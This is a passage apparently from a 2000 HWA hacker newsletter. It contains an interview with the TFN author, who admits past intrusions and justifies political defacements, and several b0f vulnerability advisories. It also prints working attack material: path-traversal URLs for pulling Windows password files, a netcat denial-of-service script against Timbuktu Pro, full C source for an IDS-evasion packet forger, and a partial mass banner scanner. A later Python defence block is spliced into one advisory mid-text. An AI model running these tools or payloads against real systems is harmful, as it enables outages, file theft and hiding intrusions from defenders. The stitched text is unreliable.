-----End of Document ID: HPSBUX9910-104--------------------------------------

      @HWA

19.0  [b0f] Latest releases from Buffer Overflow Security
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Source: http://b0f.freebsd.lublin.pl/

      Not *everything* that is new has been published here. Check the
      site to see what you may be missing, meanwhile a good cross section
      of b0f's new releases is featured here in following sections, with
      a couple of advisories first then some new code. - Ed

      @HWA

20.0  [HWA] Informal chat/interview with Mixter
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Mixter    http://mixter.warrior2k.com/
      Cruciphux http://welcome.to/HWA.hax0r.news/

      Mixter is the author of TFN (Tribe Flood Network) software which
      was recently brought into the limelight by Mafiaboy who used a
      variant called mstream to attack some big name web sites and
      effectively shut them down for several hours.

      ->
      -> Technical Overview:
      ->
      -> See Packetstorm http://packetstorm.securify.com
      -> http://packetstorm.securify.com/papers/unix/tfn.analysis.txt
      ->
      -> Analysis of the "Tribe Flood Network", or "TFN", by Mixter.
      -> TFN is a powerful distributed attack tool and backdoor currently
      -> being developed and tested on a large number of compromised
      -> Unix systems on the Internet.
      ->

      Sunday afternoon May 21st 2000.

      [ For the most part un-edited so you can decide what is ]
      [ interesting and what isn't, general chatter has been  ]
      [ removed and hostnames blanked out.                    ]

***** ADDENDUM/CORRECTION ***************************************************

      [ NOTE: I was incorrectly under the assumption at the time of this
        interview that Mafiaboy used Mixter's code to do his DDoS damage,
        this turned out to be false, in fact mstream (discussed elsewhere
        with source code) was used and NOT TFN. My apologies for the
        inaccuracies. - Cruciphux ]

******************************************************************************

Session Start: Sun May 21 13:13:43 2000
Session Ident: Mixter (mixter@*.net)
[13:19] what inspired you to write the TFN software?
[13:20] what where your goals, thoughts, intended uses
[13:20] :
[13:20] hmm
[13:20] well, I coded it for the same purpose I code everything, because I simply like coding, and now or then you'll create something important
[13:21] if not, coding something is always a new excercise for yourself...
[13:21] you could code something but still not release it publically, was it merely POC or did you expect it to be used?
[13:22] I've heard about these tools on irc like two years ago, at least that people wanted to create them
[13:22] POC=? :)
[13:22] sorry I spend way too little time in usenet etc.
[13:22] Proof Of Concept
[13:22] np
[13:22] o
[13:23] no, the first version was just a nice powerful tool to write up
[13:23] what is your view on the Mafiaboy debacle and how do you feel about your software being used to attack major web sites?
[13:24] it was interesting to see this concept worked, and you could contact hosts at a fast speed and with tunneling through raw packets and all
[13:24] tfn2k, was however a pure POC.. any kiddie who tried to use it will know how buggy it is :)
[13:25] can you explain the concept to us and how it works?
[13:25] I think, when the government and media forces need something to puff out, they'll always find something
[13:25] if it wasnt for the dos attacks, it wouldve been something else
[13:26] I believe all packet kiddies out there should get a life... but they do more damage to irc servers and users than anything else, though
[13:26] true but it was you that made the tool available, they may not otherwise have decided to attack these sites
[13:27] do you feel responsible at all?
[13:28] the plain concept of distributed attacks is to start processes from a lot of hosts, simple as that. in distributed packet flooding, you launch all processes against a single target. theoretically, before all the tools came out, when people just logged on to a lot of shells and run their udp/syn flooders against 1 target, that was the same stuff. what the new programs do, raw tunneling, or encrypted tcp control connections are just feature improvements to the same
[13:28] that they have a big impact on feasibility and speed of distributed attacks and other things like distributed scanning
[13:28] hm ok :)
[13:29] its important to realize that the "authorities" biggest instrument is false guilt
[13:30] people can't withdraw from it, and if they do, they're still being persecuted.. so I believe that people like mafiaboy arent innocent since they knew what they were doing, but simply sitting in front of your home computer and typing in commands can hardly make you a "criminal"
[13:31] would you extend that view to "hacking" also?
[13:31] whats your view on people who deface websites?
[13:32] if you talk about hacking as in breaking into servers, I have no ethical problems with it as long as it is for the cause of improving the security, e.g. patching and/or notifying the people
[13:33] so you are ok with non destructive intrusion so long as you patch the hole you came in through?
[13:33] website defacements in general are destructive, because they can harm companies by destroying their images.. so it isnt something people should do.. exceptions are of course sites that stand for violation human and individual rights
[13:33] what if the system is borrowed to say, host a bot on irc or launch further intrusion attempts?
[13:34] yes I personally believe that socio-politcal defacements with a valid message are justifiable
[13:34] well, I DONT recommend intrusion at all in these big brotherish times, it's far more easy to do productive, legal work, by working for a company or founding your own one, but lets say I have no problem with it, if no damage is created
[13:35] what other software are you working on presently?
[13:35] if they hack systems to host a bot, that's a pretty clueless and dangerous way... if they HAVE to intrude or if they dont have the small money, the only acceptable way is to contact the administration, notify them of the problem and ask for resources in exchange for securing their site
[13:36] yeah.. it's pretty lame though, when you see some anti-human-rights site defaced, and you have in black on gray one line of text that says "pr0pz to muh brothers of the gibson h4xing cl4n"
[13:36] ;/
[13:37] considering the little cost involved in offering a hacker system resources in exchange for securing a server it seems strange it doesn't happen more often
[13:37] well, security software, auditing software and more.. the problem is I can't disclose that without permission from my employees, and I wouldn't break my agreement
[13:37] err employers
[13:38] you currently are employed in the security field, were you ever a grey-hat?
[13:38] i suppose thats a round about way of asking if you have hacked yourself in the past
[13:38] yes it does.. but the whole thing is based on trust, and if it would become practice that hackers outline vulnerabilities and then get local access (from where they have LOTS of insider attacking possibilities), most people would have a problem trusting them
[13:39] heh.. well yeah, I broke into hosts without permission in the past
[13:39] trust is earned however and the notification of intrusion would be a demonstration of intent
[13:39] at the beginning of my carreer, I started out with developing eggdrop/tcl (not for takeover, just for defense and fun for the most part)
[13:39] how old are you?
[13:40] that was 2 1/2 years ago.. I hadn't a clue about the legal issues back then, and wasn't even certain if what I was doing is illegal
[13:42] ah, the notification of intrusion could also be used as a social engineering (<- stupid term :P) method, to get the trust, and then attack them from the inside with their consent :>
[13:42] how did you get into computers? what was your intial exposure? first machine?
[13:43] no, I don't care about that, after about 50 news agencies published name, address, birthdate, and photos of me back in february :P
[13:43] k
[13:45] how did you get into computers? what was your intial exposure? first machine?
[13:46] my initial exposure was a c64 I used when I was about 6-8 yrs old
[13:46] i programmed a lot in basic, some machine language later :)
[13:47] Are you self taught or do you have any official schooling in programming etc?
[13:47] if people wouldnt all start with big PC OS's like windows, they'd probably figure out programming and the ins and outs of computing much better and faster...
[13:47] yeah I started on a vic-20
[13:47] wrote a bbs on it
[13:47] it had 4k ram
[13:47] oh well, the nice feds took away my computer back in 98
[13:48] for what?
[13:48] i hadnt had a pc for 3 months, that was when I read awful lots of programming, networking etc books and really got into the technical aspects
[13:48] for installing some bots on a couple of hosts :]
[13:48] *g*
[13:49] thats about it really, thanks for yer time, any closing comments?
[13:49] hey, nobody's perfect. I really *was* clueless about the tracing stealthing etc aspects of hacking, leave alone the legal stuff back then.. just exploring and doing anything I could :)
[13:49] :-)
[13:49] nope, if you dont have any closing questions ;)
[13:49] when I sold my first c64 system, the guy that bought had nagged and nagged me
[13:50] hehe
[13:50] for some phreaking software i had, I finally gave in and let him have it warning him not to
[13:50] actually use it unless he learned how it worked etc
[13:50] he called me a week later
[13:50] phreaking is something nice.. I really wish I could've done it in the time and/or country when it was feasible and not too dangerous
[13:50] he was busted and had the $750 system confiscated
[13:50] :)
[13:51] aw :)
[13:51] I was into it when I was younger
[13:51] it was fun
[13:51] i spent $3000 on my first PC
[13:51] yeh same here
[13:51] the one that got confiscated ;x
[13:52] I paid $900 for a used 9M hard drive for my c64 bbs and $1000 for the USR 9600 external modem
[13:52] heh
[13:54] funny thinking about a 9 megabyte hard disk these days, it was the size of a ups
[13:55] actually it might have been 7M
[13:55] anyways we're all done i'll ttyl - thanks
Session Close: Sun May 21 13:55:44 2000

END

      @HWA

21.0  [b0f] b0f3-ncurses.txt FreeBSD 3.4 libncurses buffer overflow by venglin
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      2000-04-24

_____________________________________________________________________
b u f f e r 0 v e r f l 0 w   s e c u r i t y   a d v i s o r y   # 3

Advisory Name: libncurses buffer overflow
Date: 24/4/00
Application: NCURSES 1.8.6 / FreeBSD 3.4-STABLE
Vendor: FreeBSD Inc.
WWW: www.freebsd.org
Severity: setuid programs linked with libncurses can be exploited to
          obtain root access.
Author: venglin (venglin@freebsd.lublin.pl)
Homepage: www.b0f.com

* The Problem

lubi:venglin:~> cat tescik.c
#include
main() { initscr(); }
lubi:venglin:~> cc -g -o te tescik.c -lncurses
lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'`
lubi:venglin:~> gdb ./te
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
(gdb) run
Starting program: /usr/home/venglin/./te

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

* Vulnerable Versions

- 3.4-STABLE -- vulnerable
- 4.0-STABLE -- not tested (probably *not* vulnerable)
- 5.0-CURRENT -- *not* vulnerable

      @HWA

22.0  [b0f] b0f2-NetOp.txt NetOp, Bypass of NT Security to retrieve files
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      by axess 2000-04-12

_____________________________________________________________________
b u f f e r 0 v e r f l 0 w   s e c u r i t y   a d v i s o r y   # 2

Advisory Name: NetOp, Bypass of NT Security to retrieve files
Date: 12/4/00
Application: NetOp Remote Control
Vendor: Danware
WWW: www.netop.dk
Severity: Any user can browse and even download files from the remote
          computer
Author: axess ( axess@mail.com )
Homepage: www.b0f.com

* Overview

NetOp is a remote administrator control tool that allows you to capture
the screen and it will act as if you were in front of it. It's a
client / host based software.

* The Problem

By default there is no account set up to verify that you are authorised
to use the host software running on the server and anyone that has a
client for it can access the screen.
Default port 6502 is used. I have done a lot of testing of this and found
out that most of the people running it don't use the accounts that can be
set up to verify with an account and password that you are allowed to use
the host. They rely on the NT security with locking the screen that
should be enough. So if we log on we get a normal screen that says login
with administrator account. Not easy to bypass, but then there is a
function that you can use called file transfer. I use that method and a
screen that looks like explorer will appear and you can download sam._ or
whatever file you want and start cracking it while just bypassing all the
NT security.

* Vulnerable Versions

Version 6 is the only one tested but I believe all versions prior to that
are vulnerable.

* Fix

6.5 has just been released and uses the NT security that will fix this
problem.

copyright © 1999-2000 axess , buffer0verfl0w security www.b0f.com

      @HWA

23.0  [b0f] b0f1-Mailtraq.txt Mailtraq remote file retrieving
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      by slash 2000-03-22

_____________________________________________________________________
b u f f e r 0 v e r f l 0 w   s e c u r i t y   a d v i s o r y   # 1

Advisory Name: Mailtraq remote file retrieving
Date: 3/22/00
Application: Mailtraq 1.1.4 for Win 95/98
Vendor: Fastraq Limited
WWW: www.mailtraq.com
Severity: Any user can browse and even download files from the remote
          computer
Author: slash (tcsh@b0f.i-p.com)
Homepage: www.b0f.com

* Overview

Mailtraq is a message server aimed at individuals, small and medium sized
companies and home offices (SOHOS). Mailtraq’s primary goal is to provide
online services to local users by storing incoming and outgoing news and
mail messages offline, then connecting to the Internet at controlled
intervals to deliver outgoing messages and collect and store incoming
messages.
Mailtraq provides fully featured Mail, News and Intranet services, full
disk logging of all activity, comprehensive firewall facilities plus many
other services such as a Finger client, Mail-to-News and News-To-Mail
gateways, Web Administration, etc. Mailtraq requires either the Windows
NT (Server or Workstation), Windows 95 or Windows 98 operating systems to
be running on the machine on which it is loaded.

* The Problem

By default Mailtraq installs its Webmail Administration menu which is
accessible via http://some.domain.com/$/admin . The problem occurred when
we tried to retrieve http://some.domain.com/

We configured Mailtraq's WWW server root directory to be

  C:\Program Files\Mailtraq\websys\webmail

Since that \websys\webmail directory doesn't contain index.html the
server returned the complete file listing of the directory
C:\Program Files\Mailtraq\websys\webmail. So we tried to exploit this a
little bit, and discovered that anyone can browse and download files on
the remote computer running Mailtraq Mail Server. Here is how to exploit
it:

  http://127.0.0.1/./../../../

And you should get the complete listing of files in c:\Program Files\ .
When we tried to exploit this, we could only browse files from
c:\Program Files\ . When we would add some more /../../../ to the
existing URL we would get a "404 Page not found". We played around with
this a little bit and found a way to exploit this too. To get to windows
we should add some more /../../../ but a correct directory name was
required. So we did it this way:

  http://127.0.0.1/../../../../../../../../../../././../../././..././.../.../windows/

Here it is!!! The complete listing of C:\windows . Now this is as far as
we go. On Windows NT machines running Mailtraq you could just get sam._ ,
run l0phtcrack against it and compromise the machine.

There is also a bug that allows the remote attacker to find out in what
directory Mailtraq is installed.
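
A server-side check that refuses the dot-segment requests shown above and keeps local paths out of error pages (the path disclosure this advisory also reports), as an added Python example; it is not part of the original advisory and not Mailtraq's code. `resolve`, `handle`, `Rejected`, `MAX_URL_PATH` and the `exists` callback are hypothetical names, the document root is the one from the advisory's test setup, and the 255-character limit is an assumption.

```python
import ntpath                      # Windows path rules, usable on any OS
from urllib.parse import unquote

# Document root from the advisory's test configuration.
WEB_ROOT = r"C:\Program Files\Mailtraq\websys\webmail"
MAX_URL_PATH = 255                 # assumed limit for this example


class Rejected(Exception):
    """A refused request: HTTP status plus a generic reason, nothing else."""

    def __init__(self, status, reason):
        super().__init__(reason)
        self.status = status
        self.reason = reason


def resolve(url_path, root=WEB_ROOT):
    """Map a URL path to a file below root, or raise Rejected."""
    if len(url_path) > MAX_URL_PATH:
        raise Rejected(414, "Request-URI Too Long")
    path = unquote(url_path)       # decode %2e%2e and friends before checking
    if any(ord(c) < 32 for c in path) or "\\" in path or ":" in path:
        # control characters, backslash separators, drive letters
        raise Rejected(400, "Bad Request")
    parts = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue               # "//" and "/./" add nothing to the path
        # "..", "..." (used in the advisory's URL) and ". ." are empty once
        # dots and spaces are stripped; names ending in a dot or space are
        # refused too, because Windows ignores those trailing characters.
        if seg.strip(". ") == "" or seg != seg.rstrip(". "):
            raise Rejected(400, "Bad Request")
        parts.append(seg)
    full = ntpath.normpath(ntpath.join(root, *parts))
    # Second line of defence: the normalized result must still be under root.
    base = ntpath.normcase(ntpath.normpath(root))
    probe = ntpath.normcase(full)
    if probe != base and not probe.startswith(base + "\\"):
        raise Rejected(403, "Forbidden")
    return full


def handle(url_path, exists):
    """Return (status, body); `exists` is a caller-supplied file lookup."""
    try:
        target = resolve(url_path)
    except Rejected as err:
        return err.status, f"{err.status} {err.reason}"
    if not exists(target):
        return 404, "404 Not Found"   # generic text, no filesystem path
    return 200, "OK"


if __name__ == "__main__":
    # Constructed requests modelled on the URLs quoted in the advisory.
    samples = [
        "/index.html",
        "/./../../../",
        "/../../../../../../../../../../././../../././..././.../.../windows/",
        "/%2e%2e/%2e%2e/windows/",
        "/../" + "a" * 5000,
    ]
    for s in samples:
        print(handle(s, lambda p: False), s[:50])
```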
By inputting a large string after http://some.domain.com/ the server will
return the path to Mailtraq's installation directory. Example:

  http://127.0.0.1/../aaaaaaaaa[a lot of a's]aaaaaaa

The output you should get will look like this:

  File "C:\Program Files\Mailtraq\websys\webmail\aaaaaa[a lot of a's]aaaaaa" could not be found

* Vulnerable Versions

We tested version 1.1.4. on Windows 98. All versions prior to 1.1.4 are
vulnerable. We aren't sure if the Windows NT version is affected.

* Fix

At this time we aren't familiar with any fix for this bug.

copyright © 1999-2000 slash, buffer0verfl0w security www.b0f.com

      @HWA

24.0  [b0f] Exploit/DoS /makes Timbuktu Pro 2.0b650 stop responding to connections
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#!/bin/sh
# *Needs netcat in order to work......*
# Immune systems:
# Timbuktu Pro 2000
#
# Vulnerable systems:
# Timbuktu Pro 2.0b650 (Also incorrectly known as Timbukto)
#
# Exploit:
# - Connect and disconnect to port TCP/407 and port TCP/1417 will start
# listening.
# - Connect on port TCP/1417 (using a simple telnet client).
# - Disconnect from TCP/1417 (with no data exchange).
#
# Workaround:
# - Kill Timbuktu process (using pslist/pskill for example).
# - Stop Timbuktu services.
# - Start them again.

echo "Exploit:"
echo " - Connect and disconnect to port TCP/407 and port TCP/1417 will start listening."
echo " - Connect on port TCP/1417 (using a simple telnet client)."
echo " - Disconnect from TCP/1417 (with no data exchange)."
echo "Coded: eth0 from buffer0vefl0w security (b0f)"
echo "[http://b0f.freebsd.lublin.pl]"

echo "Checking if host is actually listening on port 407"
telnet $1 407 1>.timb.tmp 2>.timb.tmp &
echo "Sleeping 5 seconds..."
sleep 5
killall -9 telnet 1>/dev/null 2>/dev/null
cat .timb.tmp | grep "Connected" >/dev/null 2>&1
if [ $? -eq 0 ]; then
timb="1"
echo "[$1] is listening on port 407..."
echo "Exploiting:..."
nc $1 1417 1>/dev/null 2>/dev/null
sleep 3
killall -9 nc 1>/dev/null 2>/dev/null
echo "Done!!"
fi
if [ "$timb" != "1" ]; then
echo "[$1] Is not listening on port 407 = doesn't exist..."
fi

      @HWA

25.0  [b0f] ides.c:'Intrusion Detection Evasion System'
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/*
 * ides version 0.3 - 'intrusion detection evasion system'
 * (c) Jan 2000 by Mixter
 *
 * IDES will go into background and watch incoming traffic, inserting forged
 * TCP ack, rst and fin packets for every transmitted data packet. The sessions
 * will not be affected, since the sequence numbers change, but all sniffing
 * and monitoring software that evaluates raw packets is possibly tricked into
 * evaluating the forged data or seeing reset connections, making logging
 * unreliable or impossible. As a second feature, IDES will create a custom
 * amount of fake SYNs on each valid tcp connection request, transparently
 * simulating coordinated/decoy scans from random source addresses.
 * IDES can be used on a remote host or locally to fool sniffers, IDS and
 * other network monitors and to generate random decoy probes while scanning.
 * Acknowledgements: MUCH of this idea is from stran9ers (private) code, which
 * is better to configure, and from horizons article in Phrack 54.
 *
 * Changes:
 * v 0.3 - code sanitized, prevent generation of ACK storms/feedback loops
 * v 0.2 - now uses a unique XOR (ph33r) challenge value for each process
 */

#define DECOYS 10		/* number of forged SYNs to send on each tcp connection initiation */
#undef DEBUG			/* stay in foreground + dump packet info */
#undef NO_INADDR		/* solaris */

#include
#include
#include
#include
#include
#include
#include
#include

#ifndef IP_HDRINCL
#define IP_HDRINCL 3
#endif
#ifndef PF_INET
#define PF_INET 2
#endif
#ifndef AF_INET
#define AF_INET PF_INET
#endif

typedef unsigned char u8;
typedef unsigned short int u16;
typedef unsigned int u32;

#ifndef NO_INADDR
#ifndef in_addr
struct in_addr
{
  unsigned long int s_addr;
};
#endif
#endif

#ifndef htons
#if __BYTE_ORDER == __BIG_ENDIAN
#define ntohl(x) (x)
#define ntohs(x) (x)
#define htonl(x) (x)
#define htons(x) (x)
#else
unsigned long int htonl (unsigned long int hostlong);
unsigned short int htons (unsigned short int hostshort);
unsigned long int ntohl (unsigned long int netlong);
unsigned short int ntohs (unsigned short int netshort);
#endif
#endif

#define IP 0
#define TCP 6
#define RAW 255

struct sa
{
  u16 fam, dp;
  u32 add;
  u8 zero[8];
}
sadd;

struct ip
{
#if __BYTE_ORDER == __LITTLE_ENDIAN
  u8 ihl:4, ver:4;
#else
  u8 ver:4, ihl:4;
#endif
  u8 tos;
  u16 tl, id, off;
  u8 ttl, pro;
  u16 sum;
  u32 src, dst;
}
 *ih;

struct tcp
{
  u16 src, dst;
  u32 seq, ackseq;
#if __BYTE_ORDER == __LITTLE_ENDIAN
  u16 res1:4, doff:4, fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, res2:2;
#else
  u16 doff:4, res1:4, res2:2, urg:1, ack:1, psh:1, rst:1, syn:1, fin:1;
#endif
  u16 win, sum, urp;
}
 *th;

unsigned short ip_sum (unsigned short *, int);

unsigned short
ip_sum (addr, len)
     unsigned short *addr;
     int len;
{
  register int nleft = len;
  register unsigned short *w = addr;
  register int sum = 0;
  unsigned short answer = 0;

  while (nleft > 1)
    {
      sum += *w++;
      nleft -= 2;
    }
  if (nleft == 1)
    {
      *(unsigned char *) (&answer) = *(unsigned char *) w;
      sum += answer;
    }
  sum = (sum >> 16) + (sum &
			   0xffff);
  sum += (sum >> 16);
  answer = ~sum;
  return (answer);
}

char rseed[65535];
int rcounter = 0;

void
random_init (void)
{
  int rfd = open ("/dev/urandom", O_RDONLY);
  if (rfd < 0)
    rfd = open ("/dev/random", O_RDONLY);
  rcounter = read (rfd, rseed, 65535);
  close (rfd);
}

inline long
getrandom (int min, int max)
{
  if (rcounter < 2)
    random_init ();
  srand (rseed[rcounter] + (rseed[rcounter - 1] << 8));
  rcounter -= 2;
  return ((random () % (int) (((max) + 1) - (min))) + (min));
}

u32 magic;
char packet[1024], *dh;

#define GETLRANDOM (getrandom (0, 65535) * getrandom (0, 65535))
#define CLONED ((ntohl(th->seq) == (ntohl (ih->src)^magic)))

void
syndecoy (int s)
{
#ifdef DEBUG
  printf ("*");
#endif
  sadd.fam = AF_INET;
  sadd.dp = th->dst;
  sadd.add = ih->dst;
  ih->ver = 4;
  ih->ihl = 5;
  ih->tos = 0x00;
  ih->tl = sizeof (struct ip) + sizeof (struct tcp);
  ih->id = getrandom (0, 65535);
  ih->off = 0;
  ih->ttl = getrandom (200, 255);
  ih->pro = TCP;
  ih->sum = 0;
  ih->src = htonl (GETLRANDOM);
  th->seq = htonl (ntohl (ih->src) ^ magic);
  th->ackseq = 0;
  th->res1 = 0;
  th->doff = 0;
  th->fin = 0;
  th->syn = 1;
  th->ack = 0;
  th->rst = 0;
  th->psh = 0;
  th->ack = 0;
  th->urg = 1;
  th->res2 = 0;
  th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + 1) & ~1);
  ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + 1) & ~1);
  memset (dh, 0, 256);
  sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp), 0, (struct sockaddr *) &sadd, sizeof (sadd));
}

void
idscrew (int s)
{
  int flg = ((th->ack) && (!th->psh)), rl = getrandom (0, 256);
#ifdef DEBUG
  printf (".");
#endif
  sadd.fam = AF_INET;
  sadd.dp = th->dst;
  sadd.add = ih->dst;
  ih->ver = 4;
  ih->ihl = 5;
  ih->tos = 0x00;
  ih->tl = sizeof (struct ip) + sizeof (struct tcp);
  ih->id = getrandom (0, 65535);
  ih->off = 0;
  ih->ttl = getrandom (200, 255);
  ih->pro = TCP;
  ih->sum = 0;
  th->seq = htonl (ntohl (ih->src) ^ magic);
  th->ackseq = htonl (GETLRANDOM);
  th->res1 = 0;
  th->doff = 0;
  th->fin = 0;
  th->syn = 0;
  th->ack = 1;
  th->rst = 0;
  th->psh = 1;
  th->ack = 0;
  th->urg = 0;
  th->res2 = 0;
  memset (dh, 0, 256);

  th->ack = 0;
  th->psh = 0;
  th->rst = 1;
  th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + 1) & ~1);
  ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + 1) & ~1);
  sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp), 0, (struct sockaddr *) &sadd, sizeof (sadd));

  if (flg)			/* this is necessary to prevent ev1l ACK st0rmz#@!$ */
    return;

  th->rst = 0;
  th->fin = 1;
  th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + 1) & ~1);
  ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + 1) & ~1);
  sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp), 0, (struct sockaddr *) &sadd, sizeof (sadd));

  ih->tl += rl;
  th->fin = 0;
  th->ack = 1;
  memcpy (dh, rseed + getrandom (0, 5000), rl);
  th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + rl + 1) & ~1);
  ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + rl + 1) & ~1);
  sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp) + rl, 0, (struct sockaddr *) &sadd, sizeof (sadd));

  th->psh = 1;
  memcpy (dh, rseed + getrandom (0, 5000), rl);
  th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + rl + 1) & ~1);
  ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + rl + 1) & ~1);
  sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp) + rl, 0, (struct sockaddr *) &sadd, sizeof (sadd));
  ih->tl -= rl;
}

int
main (int argc, char **argv)
{
  char *opt = "1";
  int i = 0, s = socket (AF_INET, SOCK_RAW, TCP);

  magic = GETLRANDOM;		/* initialize our magic challenge */
  ih = (struct ip *) packet;
  th = (struct tcp *) (packet + sizeof (struct ip));
  dh = (char *) (packet + sizeof (struct ip) + sizeof (struct tcp));

#ifndef DEBUG
  if ((i = fork ()))
    {
      printf ("%s launching into the background (pid: %d)\n", argv[0], i);
      exit (0);
    }
#endif

  if (s < 0)
    perror ("");
  if (setsockopt (s, IP, IP_HDRINCL, opt, sizeof (opt)) < 0)
    perror ("");
  while (1)
    {
      if (read (s, packet, 1020) > 0)
	if ((!CLONED) && (th->ack))
	  {
#ifdef DEBUG
	    printf ("Seq: %lu, ack: %lu, src: %lu (S%dA%dP%dF%dR%dU%d)\n", ntohl (th->seq), ntohl (th->ackseq), ntohl (ih->src), th->syn, th->ack, th->psh, th->fin, th->rst, th->urg);
	    fflush (stdout);
#endif
	    if (th->syn)
	      for (i = 0; i < DECOYS; i++)
		syndecoy (s);
	    else if ((!th->fin) && (!th->rst))
	      idscrew (s);
	  }
      memset (packet, 0, 1024);
    }

  return 0;
}

/* $t34lthy OoOoO . h4x3r _______( o__ o |___\ 0|_ | _ ( _| O / 0|___||_O(___| ( 1 4m h1d1ng!@$ ) */

      @HWA

26.0  [b0f] lscan2.c Lamerz Scan, a small fork()ing scanner..
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      .. used to log bind, pop3, imap, etc banners from many hosts quickly.

/* lscan2.c - 1999 (c) Mixter */
/* compile: gcc -O3 -s -Wall lscan2.c -o lscan */

#define INITIAL_TIMEOUT 5	// how long to wait for a connection
#define WAIT_FORK 550000	// wait 1/2 second between forks

#define BIND "ns.log"
#define POP "pop.log"
#define IMAP "imap.log"
#define RPC "mountd.log"
#define FTP "ftp.log"
#define STATUSLOG "status.log"

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define SSA sizeof(struct sockaddr)
#define SOX socket(AF_INET,SOCK_STREAM,0)

int s1,s2,s3,s4,s5;

int ncon(int tsock, char *ip, int port, int timeout);
void invoke(struct hostent *host, int port);	// udp send
void usage(char *name, char *text);		// print usage & die
int validip(char *ip);				// check and correct ip address
void fchk(FILE *fp);				// check a file
void timedout(int sig);				// dummy function
int background();				// background a process
void scan0r(char *ip);				// log services for one ip

char buf[75];		// read the first 75 chars from a server

int main(int argc,char **argv)
{
 FILE *data,*err;
 char ip[30];
 int pid;

 if((argc!=2)) usage(argv[0],"");

 fprintf(stderr,"lamerz scan 1.0 by Mixter\n");
 fprintf(stderr,"scanning from %s (pid: %d)\n" ,argv[1] ,(pid=background()));

 signal(SIGHUP,SIG_IGN);
signal(SIGCHLD,SIG_IGN); // zombies suck fchk(data=fopen(argv[1],"r")); fchk(err=fopen(STATUSLOG,"a")); fprintf(err,"Started new session. File: %s, PID: %d\n",argv[1],pid); while(!feof(data)) { fscanf(data,"%s\n",ip); if(validip(ip)==1) { usleep(WAIT_FORK); // wait between fork()'s (1/2 second default) if ((pid=vfork()) < 0) { perror("fork"); exit(1); } if (pid==0) // child { scan0r(ip); // collect data for this host & save into files raise(9); return 0; } } else fprintf(err,"Invalid IP: %s\n",ip); } sleep(60); // wait for the last childs fprintf(err,"Finished session. File: %s\n",argv[1]); return 0; } void scan0r(char *ip) { int tout=INITIAL_TIMEOUT, s1=SOX,s2=SOX,s3=SOX,s4=SOX,s5=SOX, bind,pop,imap,rpc,ftp; FILE *f1,*f2,*f3,*f4,*f5; fchk(f1=fopen(BIND,"a")); fchk(f2=fopen(POP,"a")); fchk(f3=fopen(IMAP,"a")); fchk(f4=fopen(RPC,"a")); fchk(f5=fopen(FTP,"a")); rpc=ncon(s4,ip,635,tout); // we check port 635 because 2.2b29 // mountd always binds on that one if(rpc==-9) return; // host timed out else if(rpc>=0) fprintf(f4,"%s\n",ip); // log mountd connect pop=ncon(s2,ip,110,tout); if(pop==-9) return; // host timed out else if(pop>=0) { bzero(buf,sizeof(buf)); read(s2,buf,sizeof(buf)); // get popper version fprintf(f2,"%s %s\n",ip,buf); // log popper connect } pop=ncon(s2,ip,109,tout); if(pop==-9) return; // host timed out else if(pop>=0) { bzero(buf,sizeof(buf)); read(s2,buf,sizeof(buf)); // get popper version fprintf(f2,"%s !POP2! 
